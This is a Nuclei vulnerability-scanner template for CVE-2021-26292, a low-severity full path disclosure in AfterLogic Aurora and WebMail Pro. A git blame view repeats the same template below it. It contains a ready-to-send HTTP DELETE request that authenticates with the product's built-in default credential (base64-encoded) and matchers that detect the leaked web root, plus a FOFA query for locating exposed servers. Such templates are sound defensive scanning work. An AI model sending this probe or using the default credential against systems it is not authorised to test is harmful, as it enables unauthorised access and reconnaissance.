nuclei-templates/http/cves/2021/CVE-2021-26292.yaml

id: CVE-2021-26292

info:
  name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
  author: johnk3r
  severity: low
  description: |
    AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
  reference:
    - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26292
  classification:
    cve-id: CVE-2021-26292
  metadata:
    verified: true
    max-request: 1
    vendor: AfterLogic
    product: AfterLogic Aurora & WebMail
    fofa-query: "X-Server: AfterlogicDAVServer"
  tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic

http:
  - raw:
      - |
        DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "caldav_public_user"
          - "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 404
# digest: 490a00463044022055028104fa52e53dda65cd6c1fd9a36737ccf96678fcf059579ef620ef78fd70022024bc13dfdffbb91e551a6ed0049638444de819870faef2b8ad3f8cf5cee035e7:922c64590222798bb761d5b6d8e72950
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								id: CVE-2021-26292
 								info:
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								  name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								  author: johnk3r
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								  severity: low
 								  description: |
 								    AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								  reference:
 								    - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								    - https://nvd.nist.gov/vuln/detail/CVE-2021-26292
 								  classification:
 								    cve-id: CVE-2021-26292
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								  metadata:
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								    verified: true
-												tags enhancements

											
										
										
											2023-12-05 09:50:33 +00:00
+								    max-request: 1
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								    vendor: AfterLogic
 								    product: AfterLogic Aurora & WebMail
-												tags enhancements

											
										
										
											2023-12-05 09:50:33 +00:00
+								    fofa-query: "X-Server: AfterlogicDAVServer"
 								  tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
 								http:
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								  - raw:
 								      - |
 								        DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
 								        Host: {{Hostname}}
 								        Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
 								    matchers-condition: and
 								    matchers:
 								      - type: word
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								        part: body
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								        words:
 								          - "caldav_public_user"
 								          - "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
 								        condition: and
-												Update CVE-2021-26292.yaml
											
										
										
											2023-11-25 10:15:44 +00:00
+								      - type: word
 								        part: header
 								        words:
 								          - "application/xml"
-												Create CVE-2021-26292.yaml
											
										
										
											2023-11-24 00:42:45 +00:00
+								      - type: status
 								        status:
 								          - 404
-												Auto Template Signing [Wed Dec  6 05:59:55 UTC 2023] :robot:

											
										
										
											2023-12-06 05:59:56 +00:00
+								# digest: 490a00463044022055028104fa52e53dda65cd6c1fd9a36737ccf96678fcf059579ef620ef78fd70022024bc13dfdffbb91e551a6ed0049638444de819870faef2b8ad3f8cf5cee035e7:922c64590222798bb761d5b6d8e72950